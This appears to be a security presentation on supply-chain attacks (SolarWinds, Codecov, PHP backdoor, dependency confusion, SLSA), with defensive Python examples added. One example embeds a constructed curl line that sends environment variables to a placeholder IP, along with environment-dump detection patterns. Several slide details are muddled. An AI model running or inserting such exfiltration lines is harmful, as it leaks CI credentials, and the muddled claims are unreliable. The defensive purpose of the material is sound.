2. The SolarWinds Compromise
On Dec. 13, the cyber community became aware of one of the most
significant cybersecurity events of our time, impacting both commercial
and government organizations around the world.
The event was a supply chain attack on SolarWinds Orion® software conducted by suspected nation-state operators (discovered by FireEye).
3. Events Timeline
While ‘SUNBURST’ activity was only identified in December 2020, analysis of
campaign details and further analysis of SolarWinds software indicates the
event may have started, at least in preparatory phases, over a year prior.
4. SolarWinds Background
• A software company that primarily deals with systems management
solutions used by IT Network admins, Operations and Infrastructure
teams
• The most widely deployed SolarWinds product was Orion, a
‘Network Management System’ (NMS) used to monitor and
manage servers, endpoints, network devices etc.
• SolarWinds Orion was used widely and globally, including within
the US ‘Department of Defense’ (DoD)
5.
• The attack was a supply-chain based attack, in which the adversary
leveraged the software’s update mechanism. The compromise has
been linked to the US ‘Treasury Department’ and the FireEye
compromises, and the update mechanism was used to inject the ‘SUNBURST' malware /
backdoor into the code
• The SolarWinds Orion agent interrogated systems for the status of
their communication lines, which let admins take manual or
automated actions with elevated credentials that were configured by
teams with no security or risk-awareness in mind. As such, those
credentials were considered 'juicy' targets for hackers
7. NMS Are Prime Targets for Attackers
• NMS are able to communicate with all devices that are managed /
monitored
• The Orion agent can manually or automatically be used to run
commands such as Cisco shutdown / restart, by using the SNMP /
WMI protocols
• Many NMS are configured to both monitor events and respond to
them, meaning that any change the NMS can make, attackers can
make too. Why have we given away so much power to these tools?
8. SolarWinds Digital Signature – A Piece of Software With A Backdoor
• The malware was deployed as an update from SolarWinds' own servers and was digitally signed by a valid digital certificate bearing their name (issued by Symantec), which strongly points to a supply chain attack
9. The SolarWinds Attack Framework
• Delayed Execution - The ‘SUNBURST' malware checks the filesystem timestamps to ensure that the product
has been deployed for a dormant period of 12-14 days prior to the current time, before sending its first
beacon
• Anti-Sandbox Behavior - Unless the infected device is joined to a domain, the malware will not execute
• DNS Resolution & IP Address Check - If the malware resolves a domain to a private IP address, the malware
will not execute
• VMware - Command Injection Vulnerability (CVE-2020-4006) - exists in five VMware software products
focused on identity and access management
• MS / SAML - The attackers have exfiltrated SAML token signing certificates that allow them to forge tokens
and access any resources trusted by those certificates
• MFA Bypass - SAML token-forging attack; the attacker targeted the “integration secret key” used to connect
Cisco’s Duo Multi-Factor Authentication (MFA) solution to an Outlook Web Access server
10. Recommendations
• Security teams must review how NMS systems are used before they
are deployed, and educate the teams involved on the risks accordingly
• Implementation of the ‘Security, Orchestration, Automation and
Response’ (SOAR) framework should be considered
• To limit the ‘Attack Surface’, a 'Zero-Trust' network approach should
be used (block access from the NMS to the internet and, if explicitly
needed, limit the destinations)
• A ‘Threat-Modeling’ session should be performed on known risks, and
the question that should be raised is: “Does the functionality that
comes out of a service outweigh the risk, or vice versa?”
11. Initiate a ‘Threat Hunt' in your network:
• Always prioritize the 'Discovery Course of Action’ (CoA), which looks backwards,
over the 'Detection CoA’, which looks forward
• The attackers are clearly ‘OPSec'-aware and will likely have changed
any filesystem-based ‘Indicators of Compromise’ (IoCs); because the
attacker is performing counter-intelligence, IoCs that can be used for
the ‘Discovery CoA’ are the most useful
• Attackers will be re-tooling, so do not anticipate finding specifics of
the ‘SUNBURST’ malware
12.
• FireEye noted that the malicious code did not overlap with other
malware
• Other branded NMS services may likewise be configured by
Operations / IT teams, which prioritize availability and may not
have security in mind
• Security teams should run a ‘Threat Modeling' session for the access
that a compromise of an NMS would provide
• Monitor for intrusions – log everything and more, alert on events
and investigate accordingly
13.
• Since supply chain compromises are extremely difficult to protect against, this highlights the need for security to be considered as
part of the vendor selection process
• Supply chain security compromises extend to SaaS applications – your SaaS vendors do not have any magic process that makes it
easier for them to detect such threats
• Supply chain attacks may influence the victims' IPO and due-diligence efforts
• State-backed attacks are financed by countries, whose budgets are nowhere near the combined budget private security firms have
at their disposal – thus we must support the global security communities and share everything we know and may have
suffered
Thanks to:
Jake Williams @ ‘Rendition Infosec’, (rsec.us), @MalwareJake
FireEye
PaloAlto Networks
Bleeping Computer
DomainTools
14. Open-Source Code Compromises
More than 90% of organizations use open-source code today (Gartner)
The means of obtaining the code have changed:
• In the past – Projects from RedHat, Apache, Intel, IBM etc.
• At present - Bitbucket, Github and Gitlab are widely-used to develop and share
code
• There is no responsible entity to review the open-source code to confirm if it is
clean / non-malicious
• Application Security solutions are focused on detecting vulnerabilities, but they
do not detect attackers in code packages
15. The Official PHP Git server Was Targeted In An
Attempt To Inject Malware Within The Code Base
• The official PHP Git server was compromised in an apparent
attempt to plant malware in the code base of the PHP project
• The PHP programming language developer and maintainer Nikita
Popov said that two malicious commits were added to the ‘php-src’
repository in both his name and that of PHP creator Rasmus Lerdorf
• As noted by Bleeping Computer, the code appears to be designed to
implant a backdoor and create a scenario in which ‘Remote Code
Execution’ (RCE) may be possible
16.
• The malicious commits, which appeared to be signed off under the names
of Popov and Lerdorf (1,2), were disguised as simple typographical errors
that needed to be resolved
• However, instead of escaping detection by appearing so benign, the
contributors who took a closer look at the "Fix typo" commits noted
malicious code that executed arbitrary code when the
‘HTTP_USER_AGENT’ header began with a string related to ‘Zerodium’
17. Namespace Shadowing - Dependency Confusion
A 'White-Hat' (an ethical hacker) who, for alerting purposes, got into the Python Artifactory server
(JFrog) and managed to guess a true dependency package name, then:
• Uploaded his own renamed package under the true, legitimate package name,
with a higher version number than the legitimate package’s version
• Managed to inject his dependency package into MS .NET, Apple, Tesla etc. – all
that with no issues whatsoever on the true developers' side, despite them having the most
modern security defense mechanisms
After being paid a 'Bug-Bounty', the ethical hacker disclosed his approach to the payer and
proved that his theory worked
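As an added illustration of the dependency-confusion risk just described (this is not code from the deck or from the researcher involved), the check below compares an organisation's private package names against what a public registry reports for the same names and flags each one as unclaimed, colliding, or shadowed by a higher public version. Both package inventories are constructed sample data; in practice the public side would come from the registry's API.

```python
"""Dependency-confusion check over a private package inventory (added example)."""

import re

# Constructed inventory of private (internal) packages and their versions.
INTERNAL_PACKAGES = {
    "acme-billing-core": "1.4.2",
    "acme-auth-sdk": "0.9.0",
    "acme-logging": "2.1.0",
}

# Constructed snapshot of what a public registry reports for the same names.
# None means "no package of that name is published publicly".
PUBLIC_REGISTRY = {
    "acme-billing-core": "99.0.0",   # shadow: far higher version than the internal one
    "acme-auth-sdk": "0.8.5",        # same name exists publicly but with a lower version
    "acme-logging": None,            # name is still unclaimed on the public registry
}


def parse_version(version):
    """Turn a dotted version string into a comparable tuple ('1.4.2' -> (1, 4, 2))."""
    return tuple(int(part) for part in re.findall(r"\d+", version))


def resolver_picks_public(internal_version, public_version):
    """Model a resolver that merges both indexes and keeps the highest version.
    That merge behaviour is exactly what a shadowing package exploits."""
    if public_version is None:
        return False
    return parse_version(public_version) > parse_version(internal_version)


def classify(internal_version, public_version):
    """Label one package name by the kind of risk it carries."""
    if public_version is None:
        return "unclaimed"   # reserve the name publicly before someone else does
    if resolver_picks_public(internal_version, public_version):
        return "shadowed"    # a merged-index install would pull the public copy
    return "collision"      # same name exists publicly; any version bump flips it


def find_confusable(internal, public):
    """Return {package name: label} for every internal package."""
    return {
        name: classify(internal_version, public.get(name))
        for name, internal_version in internal.items()
    }


if __name__ == "__main__":
    for name, label in find_confusable(INTERNAL_PACKAGES, PUBLIC_REGISTRY).items():
        print(f"{name:20s} {label}")
```

With pip, `--extra-index-url` merges the private and public indexes and prefers the highest version, which is the `shadowed` case above; pointing a single `--index-url` at a proxy that reserves the internal names avoids the merge.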
19. The Codecov Compromise - Hundreds of Networks Reportedly Breached
A cyberattack against Codecov took place around January 31, 2021, and was only made public on April 15. The organization, which provides code coverage and testing tools, said that a 'threat actor' tampered with the Bash Uploader script, thereby compromising the Codecov-actions uploader for GitHub, Codecov CircleCI Orb, and the Codecov Bitrise Step. This enabled attackers to export data contained in user continuous integration (CI) environments.
The company learned that for over two months, Codecov’s Bash Uploader scripts used by hundreds or thousands of their customers had been altered with a malicious line of code that exfiltrated information in the environment variables present on the users’ CI/CD environments to an attacker’s IP address.
Bash Uploader exfiltrated environment variables to attacker’s IP address
The flaw originated due to an error in the Docker image creation process, which, according to Codecov, “allowed the actor to extract the credential required to modify our Bash Uploader script.”
Codecov provides code coverage, testing, and stats to over 29,000 companies, and even has a handy GitHub app to integrate the tool right within your open-source software project.
The security advisory released by Codecov strongly advised users to reset all of their credentials, tokens, or keys that were present in the environment variables in their CI processes that used Codecov uploaders.
Hundreds of clients were potentially impacted, and now Rapid7 has confirmed they were one of them.
Rapid7 says the Bash uploader was used in a limited fashion, as it was only set up on a single CI server used to test and build tooling internally for the Managed Detection and Response (MDR) service.
As such, the attacker was kept away from their product code, but they were able to access a "small subset of source code repositories" for MDR, internal credentials -- all of which have now been rotated -- and alert-related data for some MDR customers.
20.
Although the initial compromise seemed limited to Codecov’s Bash Uploader, the scope of this breach was found to have expanded well beyond just that, when U.S. federal investigators hinted at hundreds of client networks having been breached by hackers, who managed to collect customer credentials using the tainted Bash Uploader tool.
HashiCorp disclosed that their GPG private key used to sign and validate software packages had been exposed as a result of this incident.
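The Codecov incident above turned on one added line in a vendor script that CI jobs fetched and ran. As an added example (not Codecov's code), the gate below applies two checks a CI step can run before executing such a script: the script's SHA-256 must match a pinned value obtained out-of-band, and no line may dump the environment or contact a host outside an allowlist. The clean script, the tampered copy, the pinned hash and the 203.0.113.5 address are all constructed for the example.

```python
"""Integrity gate for a vendor-supplied CI helper script (added example)."""

import hashlib
import re

# Constructed "known good" uploader script.
CLEAN_SCRIPT = """#!/bin/bash
set -e
report=$(find . -name 'coverage.xml')
curl -s -X POST --data-binary @"$report" https://uploader.example/upload || true
"""

# Constructed tampered copy: one inserted line posts the git remotes and every
# environment variable to an address the vendor never used (TEST-NET-3 range).
TAMPERED_SCRIPT = CLEAN_SCRIPT.replace(
    "set -e\n",
    'set -e\ncurl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" '
    "http://203.0.113.5/upload || true\n",
)

# Stands in for a hash published by the vendor through a separate channel.
PINNED_SHA256 = hashlib.sha256(CLEAN_SCRIPT.encode()).hexdigest()
ALLOWED_HOSTS = {"uploader.example"}

# Shell constructs that dump the whole environment, and URL host extraction.
ENV_DUMP = re.compile(r"\$\(\s*(env|printenv|set)\s*\)|\bprintenv\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")


def sha256_matches(script_text, pinned_sha256):
    """First check: the fetched script must hash to the pinned value."""
    return hashlib.sha256(script_text.encode()).hexdigest() == pinned_sha256


def suspicious_lines(script_text, allowed_hosts):
    """Second check: return (line number, line) for every line that dumps the
    environment or talks to a host that is not on the allowlist."""
    findings = []
    for number, line in enumerate(script_text.splitlines(), start=1):
        unknown_hosts = set(URL_HOST.findall(line)) - allowed_hosts
        if ENV_DUMP.search(line) or unknown_hosts:
            findings.append((number, line))
    return findings


def safe_to_run(script_text, pinned_sha256, allowed_hosts):
    """Gate for the CI step: both checks must pass before the script is executed."""
    return sha256_matches(script_text, pinned_sha256) and not suspicious_lines(
        script_text, allowed_hosts
    )


if __name__ == "__main__":
    for label, script in (("clean", CLEAN_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        print(label, "safe" if safe_to_run(script, PINNED_SHA256, ALLOWED_HOSTS) else "BLOCKED")
        for number, line in suspicious_lines(script, ALLOWED_HOSTS):
            print(f"  line {number}: {line}")
```

The hash check alone is enough to block the tampered copy; the content scan is there for the case where the pinned hash itself is stale or was fetched from the same compromised source.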
21. NPM Package – “Discord.dll”
“Discord.dll”: Successor to NPM "fallguys" malware went undetected for 5 months
The 'Sonatype Security Research' team has identified a series of counterfeit components in the
NPM ecosystem:
• An attacker from the "fallguys" group wrote a malicious Python library and used the
Discord gaming community's chat platform to steal SSH keys
• Such intentionally malicious packages seem to do similar, shady things to the
malicious "fallguys" NPM package discovered in September 2020 (stealing web browser
files and Discord gaming chats)
• The new packages in question were published by the same NPM author, whose NPM
account also contained what looked like legitimate packages with genuine use cases
22. Infected Discord files:
• Discord.dll, Discord.app etc.
The attacker collected sensitive data and then sent the data to the attackers via the Discord platform
Thanks to Sonatype Security
23. The Octopus Scanner
• Targeted Java developers
• Infects the development environment
• Injects itself into compiled software
24. The malicious code takes over the ‘clean’ developer's environment. Any additional code the developer
creates afterwards gets injected with the same malicious code.
• As a dependency contributor, your infected code gets unwillingly and unknowingly spread widely to the
masses
Thanks to Security Lab
25. North Korea Targeting Security Researchers
North Korea has decided the best way to reach its favorite targets is to
gain access to the software supply chain.
• Several cyber security researchers were manipulated into assisting the
North Korean cyber security researchers.
• Selected code belonging to the ‘good guys’ was poisoned and
allowed access to their computers, their code, their secrets and zero-day
information.
26. NPM Package – "event-stream"
• A user named '@right9ctrl' asked for and was eventually granted permissions
• He added a new dependency to the project
• The new dependency contained malicious code
A known NPM package named 'event-stream@3.3.6', which was no longer maintained by its
initial contributor, was handed over to another contributor:
• The offending contributor intentionally added a piece of code that scanned and parsed
the host computer's clipboard contents, trying to locate Bitcoin wallet addresses.
When it was discovered, the first contributor denied any ties to the code's subsequent
history and added that whoever decided to use the code should blame themselves.
27. Supply Chain Attacks Are Difficult To Detect With
Current Code Security Solutions
• The current security systems are designed to detect bugs that lead to
vulnerabilities
• They are based on static analysis – ineffective in the detection of
malicious behavior
• Longer mean time to detect (MTTD) – due to manual research
28. Current Available Solutions and Work-In-
Progress
The US President has recently signed a presidential act dealing with
the software supply chain subject, the 'Software Bill of Materials' (which has
already existed for some time), that would lead to transparency and order:
• Who the code supplier is and details about its reputation history
• The code history and the processes it has gone through so far
• How the code was reviewed / what libraries, classes etc. are used
US organizations are pushing hard for this new initiative, as most of their
critical systems are vulnerable to supply chain attacks.
29. Detecting Supply-Chain Attacks In Code Packages
• A Platform for Code Packages Behavioral Analysis & Detection of
Open-source Software Supply-Chain Attacks
Thanks to Tzachi Zorn, Co-Founder & CEO @ ‘Dustico’
Dustico - https://dusti.co/
30. ‘SLSA’ - A Mitigation Solution by Google
SLSA (pronounced "salsa") is an End-to-End Framework for Supply Chain Integrity:
The proposed solution is ‘Supply chain Levels for Software Artifacts’ (SLSA), an end-to-end
framework for ensuring the integrity of software artifacts throughout the software supply
chain:
• It is inspired by Google’s internal “Binary Authorization for Borg” which has been in use
for the past 8+ years and is mandatory for all of Google's production workloads
• The goal of SLSA is to improve the state of the industry, particularly open source, to
defend against the most pressing integrity threats
• With SLSA, consumers can make informed choices about the security posture of the
software they consume
31. How SLSA Might Help
SLSA helps to protect against common supply chain attacks. The
following image illustrates a typical software supply chain and includes
examples of attacks that can occur at every link in the chain.
Each type of attack has occurred over the past several years and,
unfortunately, is increasing as time goes on.
32. (Image: a typical software supply chain, with example attacks at each link; the threats are labelled A to H)
33. Threat / Known example / How SLSA could have helped
• A – Submit bad code to the source repository. Known example: Linux hypocrite commits: a researcher attempted to intentionally introduce vulnerabilities into the Linux kernel via patches on the mailing list. How SLSA could have helped: two-person review caught most, but not all, of the vulnerabilities.
• B – Compromise source control platform. Known example: PHP: attacker compromised PHP’s self-hosted git server and injected two malicious commits. How SLSA could have helped: a better-protected source code platform would have been a much harder target for the attackers.
• C – Build with official process but from code not matching source control. Known example: Webmin: attacker modified the build infrastructure to use source files not matching source control. How SLSA could have helped: a SLSA-compliant build server would have produced provenance identifying the actual sources used, allowing consumers to detect such tampering.
• D – Compromise build platform. Known example: SolarWinds: attacker compromised the build platform and installed an implant that injected malicious behavior during each build. How SLSA could have helped: higher SLSA levels require stronger security controls for the build platform, making it more difficult to compromise and gain persistence.
• E – Use bad dependency (i.e. A-H, recursively). Known example: event-stream: attacker added an innocuous dependency and then updated the dependency to add malicious behavior. The update did not match the code submitted to GitHub (i.e. attack F). How SLSA could have helped: applying SLSA recursively to all dependencies would have prevented this particular vector, because the provenance would have indicated that it either wasn’t built from a proper builder or that the source did not come from GitHub.
• F – Upload an artifact that was not built by the CI/CD system. Known example: CodeCov: attacker used leaked credentials to upload a malicious artifact to a GCS bucket, from which users download directly. How SLSA could have helped: provenance of the artifact in the GCS bucket would have shown that the artifact was not built in the expected manner from the expected source repo.
• G – Compromise package repository. Known example: Attacks on Package Mirrors: researcher ran mirrors for several popular package repositories, which could have been used to serve malicious packages. How SLSA could have helped: similar to above (F), provenance of the malicious artifacts would have shown that they were not built as expected or from the expected source repo.
• H – Trick consumer into using bad package. Known example: Browserify typosquatting: attacker uploaded a malicious package with a similar name as the original. How SLSA could have helped: SLSA does not directly address this threat, but provenance linking back to source control can enable and enhance other solutions.
34. SLSA URL:
https://security.googleblog.com/2021/06/introducing-slsa-end-to-end-framework.html
SLSA is a practical framework for end-to-end software supply chain
integrity, based on a model proven to work at scale in one of the
world’s largest software engineering organizations. Achieving the
highest level of SLSA for most projects may be difficult, but incremental
improvements recognized by lower SLSA levels will already go a long
way toward improving the security of the open-source ecosystem.
Thanks to Patrick Mathieu, Sr. Manager, Offensive Security @ LogMeIn
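The table above repeatedly says that provenance "would have shown" an artifact was not built as expected. As an added example (not Google's or the SLSA project's code), the check below shows what a consumer-side policy over a provenance statement looks like: the artifact's digest must be a listed subject (threats F and G), the builder must be one the consumer trusts (threat D), and the recorded source must be the expected repository (threats C and E). The statement is constructed and shaped after the in-toto / SLSA provenance v0.2 layout in simplified form; the artifact bytes, builder id, repository URL and commit id are made-up values, and signature verification of the statement is assumed to happen before this check.

```python
"""Consumer-side policy check over a SLSA-style provenance statement (added example)."""

import copy
import hashlib

# Constructed artifact and the provenance statement that claims to describe it.
ARTIFACT = b"constructed release tarball bytes"
ARTIFACT_SHA256 = hashlib.sha256(ARTIFACT).hexdigest()
SOURCE_URI = "git+https://github.com/example-org/app@refs/tags/v1.0.0"

PROVENANCE = {
    "_type": "https://in-toto.io/Statement/v0.1",
    "subject": [{"name": "app-1.0.0.tar.gz", "digest": {"sha256": ARTIFACT_SHA256}}],
    "predicateType": "https://slsa.dev/provenance/v0.2",
    "predicate": {
        "builder": {"id": "https://ci.example/builders/hosted@v1"},
        "invocation": {
            "configSource": {
                "uri": SOURCE_URI,
                "digest": {"sha1": "0" * 40},  # constructed placeholder commit id
                "entryPoint": ".github/workflows/release.yml",
            }
        },
        "materials": [{"uri": SOURCE_URI, "digest": {"sha1": "0" * 40}}],
    },
}

# What this consumer is willing to accept.
POLICY = {
    "trusted_builders": {"https://ci.example/builders/hosted@v1"},
    "source_prefix": "git+https://github.com/example-org/app@",
}


def verify_provenance(artifact_bytes, statement, policy):
    """Return the list of policy violations; an empty list means the artifact is accepted."""
    violations = []
    if statement.get("predicateType") != "https://slsa.dev/provenance/v0.2":
        violations.append("unexpected predicate type")

    # F / G: the artifact we hold must be exactly one the builder attested to.
    digest = hashlib.sha256(artifact_bytes).hexdigest()
    subjects = statement.get("subject", [])
    if not any(s.get("digest", {}).get("sha256") == digest for s in subjects):
        violations.append("artifact digest is not a subject of the provenance (not built as expected)")

    # D: only builders the consumer trusts may vouch for an artifact.
    predicate = statement.get("predicate", {})
    builder_id = predicate.get("builder", {}).get("id")
    if builder_id not in policy["trusted_builders"]:
        violations.append(f"untrusted builder {builder_id!r}")

    # C / E: the build must have consumed the expected source repository.
    source = predicate.get("invocation", {}).get("configSource", {}).get("uri", "")
    if not source.startswith(policy["source_prefix"]):
        violations.append(f"source {source!r} is not the expected repository")
    materials = [m.get("uri", "") for m in predicate.get("materials", [])]
    if source and source not in materials:
        violations.append("config source is not listed among the build materials")
    return violations


def with_builder(statement, builder_id):
    """Copy of a statement that names a different builder (used to show a failing check)."""
    altered = copy.deepcopy(statement)
    altered["predicate"]["builder"]["id"] = builder_id
    return altered


if __name__ == "__main__":
    print("genuine:", verify_provenance(ARTIFACT, PROVENANCE, POLICY))
    print("swapped artifact:", verify_provenance(b"other bytes", PROVENANCE, POLICY))
    print("rogue builder:", verify_provenance(ARTIFACT, with_builder(PROVENANCE, "https://unknown.example/b"), POLICY))
```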
35. Additional Security-Related “Don’t Say You
Were Not Warned...”
• 80% of companies that pay a ransomware ransom are exploited
again, with about 1/2 of them believing it was the same group in the
subsequent attack. Is that enough proof that paying a ransom is not a
good strategy? If your security controls weren't good enough to stop
the ransomware, they definitely aren't good enough to detect a
rootkit - https://www.zdnet.com/article/most-firms-face-second-ransomware-attack-after-paying-off-first/#ftag=RSSbaffb68
Thanks to Michael Fischer, Sr. Manager, Product Security @ LogMeIn
36. 7 Cybersecurity Breaches In 2020 & How They
Could Have Been Prevented
1. SolarWinds: Third Party Infiltration (covered above)
2. Portnox: Network Penetration
3. Pulse Secure: VPN Vulnerabilities
4. Marriott: Fraudulent Login from Stolen Details
5. Cisco: Disgruntled Former Employee
6. University of California: Ransomware
7. UN Maritime Agency: Possible Watering Hole Attack
URL: https://cyolo.io/blog/7-data-cybersecurity-breaches-in-2020-how-they-could-have-been-prevented/
37. And Last, But Not Least – Shirbit Insurance
Israel Shaken By Data Leak After Ransomware Attack At ‘Shirbit Insurance’ Company:
• Hackers leak screenshot of negotiation with breached insurance giant
• Israeli government reportedly reconsidering relationship with insurance firm following security breach
A hacking gang calling itself Black Shadow has demanded a giant insurance firm pay a US $3.8 million ransom
after encrypting and stealing sensitive data and documents about its clients.
Customers of the victim, Israel’s Shirbit insurance company, have been advised to consider obtaining new
identity cards and driving licenses due to the risk of identity theft after the hackers released a third wave of
stolen data this past weekend.
Leaked data has included scans of identity cards, marriage certificates, and financial and medical documents.
URL: https://hotforsecurity.bitdefender.com/blog/israel-shaken-by-data-leak-after-ransomware-attack-at-shirbit-insurance-company-24786.html
40. The SolarWinds Compromise
On Dec. 13, the cyber community became aware of one of the most significant cybersecurity events
of our time, impacting both commercial and government organizations around the world. The event
was a supply chain attack on SolarWinds Orion® software conducted by suspected nation-state
operators (discovered by FireEye):
• SolarWinds has mentioned that a vulnerability which existed until the March-June 2020
timeframe was leveraged to take advantage of their 'Orion' software product
• Evidence exists that shows the attackers’ ‘Command and Control’ (C2) infrastructure was set up as
early as August 2019. The first modified SolarWinds software was released in October 2019, and
the earliest related Cobalt Strike payload identified was generated using Cobalt Strike 4.0, which
was built in December 2019
More On NMS
• Even when NMS are configured to only monitor (read-only), the credentials used would still offer
some level of access to an attacker (read configurations, list processes etc.)
• If an attacker compromises an NMS, they can usually reshape network traffic for
man-in-the-middle (MitM) / person-in-the-middle / monkey-in-the-middle opportunities and
might then use the credentials meant for system monitoring to move laterally to target systems (if the
Orion NMS agent is domain-joined, other service accounts that exist there might allow an
attacker to leverage them and move laterally within the environment)
41. The SolarWinds Attack Framework – Delayed Execution
• The ‘SUNBURST' malware checks the filesystem timestamps to ensure that the product has been
deployed for a dormant period of 12-14 days prior to the current time, before it sends its first
beacon:
• The sample would only execute if the filesystem write time of the assembly is at least 12-14 days
prior to the current time (the exact threshold is selected randomly from an interval)
• The sample continues to check the time threshold, as it is run by a legitimate recurring
background task
• Once the threshold is met, the sample creates a ‘named pipe’ to act as a guard that only one
instance is running, before reading the specific file
'SolarWinds.Orion.Core.BusinessLayer.dll.config' from disk and retrieving the XML field
'appSettings’
• The 'appSettings' field's keys are legitimate values that the malicious logic re-purposes as a
persistent configuration
• The key 'ReportWatcherRetry' must be any value other than ‘3’ for the sample to continue
execution
This delayed execution effectively defeats malware sandboxes and other instrumented environments
as a counter-measure: even if a staging environment had been used to test the infected update
before deployment, to make certain malicious activities are avoided, the update would have left the
sandbox and been rolled out (to some 18,000 customers) in much less than 12 days.
42. The SolarWinds Attack Framework – Anti-Sandbox Behavior
According to FireEye, unless the infected device is joined to a domain, the malware will not execute:
• The sample checks that the machine is domain-joined, then retrieves the domain name before
execution continues
• A 'userID' is generated by computing the MD5 of all network interface MAC addresses that are up
and not loopback devices, the domain name, and the registry value
'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid’
• The 'userID' is encoded via a custom XOR scheme after the MD5 is calculated
• The 'ReportWatcherPostpone' key of 'appSettings' is then read from
‘SolarWinds.Orion.Core.BusinessLayer.dll.config' to retrieve the initial, legitimate value
• This operation is performed because the sample later bit-packs flags into this field, and the initial value
must be known in order to read out the bit flags
• The sample then invokes the method 'Update', which is the core event loop of the sample
43. The SolarWinds Attack Framework – VMware:
The ‘National Security Agency’ (NSA) released an advisory about CVE-2020-4006, a command injection vulnerability, stating that Russian state-sponsored actors were actively exploiting the vulnerability and suggesting US Government agencies patch immediately. This vulnerability exists in five VMware software products focused on identity and access management. Exploitation allows attackers to deploy a ‘web shell’ on the system and gain access to protected data. This vulnerability can only be exploited by someone who has already authenticated to the system, which indicates that when leveraged, it is likely used to gain additional access once the attacker is already inside the network. More information about CVE-2020-4006 can be found in our previously released Threat Brief: VMware Command Injection Vulnerability
44. The SolarWinds Attack Framework - Microsoft / SAML:
Microsoft has published multiple reports on activity related to this attack
campaign, including a summary of the backdoor implanted into SolarWinds
Orion® (referred to by Microsoft as ‘Solorigate’), as well as guidance for
their customers on protecting themselves. They have publicly stated they are
working with more than 40 companies who have been targeted in this attack
• One specific component of the attack that Microsoft has discussed in detail
is what they have observed in compromised networks with regard to
identity infrastructure. Specifically, the attackers have exfiltrated SAML
token signing certificates that allow them to forge tokens and access any
resources trusted by those certificates. Microsoft has observed these
forged tokens presented to the Microsoft cloud on behalf of their
customers
• A compromise of these certificates implies the attacker
gained the highest level of privileges inside the network and used them to
establish long-term access to the network
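A forged SAML token (slides 9 and 44) is accepted by the cloud because the signature is valid, so the detection opportunity is the gap between what the cloud saw and what the identity provider logged issuing. The correlation below is an added example, not Microsoft's or FireEye's code: it flags cloud sign-ins whose assertion id has no matching issuance record at the on-premises IdP, and tokens whose validity window exceeds policy. Both log sets are constructed and heavily simplified relative to real AD FS and cloud sign-in records.

```python
"""Correlate cloud SAML sign-ins with IdP token issuance records (added example)."""

from datetime import datetime, timedelta

# Constructed IdP (AD FS-style) issuance records: one per token the IdP minted.
IDP_ISSUANCE_LOG = [
    {"assertion_id": "_a1", "user": "alice@corp.example", "issued": "2020-12-10T08:00:00"},
    {"assertion_id": "_b2", "user": "bob@corp.example", "issued": "2020-12-10T08:05:00"},
]

# Constructed cloud sign-in records: the assertion each sign-in presented, with
# the validity window carried inside the token.
CLOUD_SIGNIN_LOG = [
    {"assertion_id": "_a1", "user": "alice@corp.example", "time": "2020-12-10T08:00:30",
     "not_before": "2020-12-10T08:00:00", "not_on_or_after": "2020-12-10T09:00:00"},
    {"assertion_id": "_b2", "user": "bob@corp.example", "time": "2020-12-10T08:05:20",
     "not_before": "2020-12-10T08:05:00", "not_on_or_after": "2020-12-10T09:05:00"},
    # Constructed forged token: never issued by the IdP, and valid for a full day.
    {"assertion_id": "_zz9", "user": "svc-backup@corp.example", "time": "2020-12-10T23:41:00",
     "not_before": "2020-12-10T00:00:00", "not_on_or_after": "2020-12-11T00:00:00"},
]

# Longest token lifetime the IdP is configured to issue (assumed policy value).
MAX_TOKEN_LIFETIME = timedelta(hours=1)


def _ts(value):
    return datetime.fromisoformat(value)


def find_unissued_tokens(idp_log, cloud_log):
    """Assertion ids the cloud accepted that the IdP has no record of issuing."""
    issued = {record["assertion_id"] for record in idp_log}
    return [signin["assertion_id"] for signin in cloud_log if signin["assertion_id"] not in issued]


def find_overlong_tokens(cloud_log, max_lifetime=MAX_TOKEN_LIFETIME):
    """Assertion ids whose validity window is longer than the IdP would ever issue."""
    return [
        signin["assertion_id"]
        for signin in cloud_log
        if _ts(signin["not_on_or_after"]) - _ts(signin["not_before"]) > max_lifetime
    ]


def triage(idp_log, cloud_log, max_lifetime=MAX_TOKEN_LIFETIME):
    """Map each suspicious assertion id to the reasons it was flagged."""
    reasons = {}
    for assertion_id in find_unissued_tokens(idp_log, cloud_log):
        reasons.setdefault(assertion_id, []).append("no-idp-issuance")
    for assertion_id in find_overlong_tokens(cloud_log, max_lifetime):
        reasons.setdefault(assertion_id, []).append("lifetime-exceeds-policy")
    return reasons


if __name__ == "__main__":
    for assertion_id, why in triage(IDP_ISSUANCE_LOG, CLOUD_SIGNIN_LOG).items():
        print(assertion_id, ", ".join(why))
```

The correlation only works if issuance auditing is enabled on the IdP and the logs are shipped off that host, since an attacker holding the signing certificate usually controls the IdP server as well.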
45. The SolarWinds Attack Framework - SUPERNOVA Web Shell:
FireEye’s initial report on the SolarWinds compromise included indicators for a
‘web shell’ they call SUPERNOVA. FireEye has removed those indicators as they no
longer believe they were used as a result of the SolarWinds software compromise.
This ‘web shell’ may not be related, but it is still vital to defend against it
The SolarWinds Attack Framework - MFA Bypass:
The SAML token-forging attack described above would allow an attacker to evade
multi-factor authentication systems, as in that case the authentication system
itself is compromised. Volexity published a report about a threat group named Dark
Halo who they have now connected to the SolarWinds compromise. Their report
describes that the attacker targeted the “integration secret key” used to connect
Cisco’s Duo Multi-Factor Authentication (MFA) solution to an Outlook Web Access
server. With that key, they were able to pre-compute the token codes necessary for
authentication
Similar to the SAML token-forging attack, this MFA bypass requires a significant
compromise of the systems used to authenticate users and would have been
performed post-compromise to extend the attacker’s access to the network
46. Open Source Code Attacks - Official PHP Server Targeted:
On the PHP Git server, an attacker group managed to gain access
and added malicious code so that any PHP server from a specific version
onwards would run attacker-supplied code when the "zerodium" word was present.
Specifically, the code checked whether the HTTP request included the header
"HTTP_USER_AGENT" and whether it began with the word "zerodium". If so, it
would execute the rest of the string as PHP code. Eventually, the malicious code
was discovered by chance and was removed. To infosec teams such code might look
normal, and the fact that the malicious code, or part of it, was removed does not
mean a full-scale attack was over. We cannot assume that other programming
languages were not affected as well. Attackers never stop just because one attack
was stopped.
47. Additional Past Supply Chain Attacks
• September 2015 – XcodeGhost: An attacker distributed a version of Apple’s Xcode software (used to build iOS and macOS
applications), which injected additional code into iOS apps built using it. This attack resulted in thousands of compromised apps
identified in Apple’s app store
• March 2016 – KeRanger: Popular open source BitTorrent client, Transmission, was compromised to include macOS ransomware in
its installer. Attackers compromised the legitimate servers used to distribute Transmission, so users who downloaded and installed
the program would be infected with malware that held their files for ransom
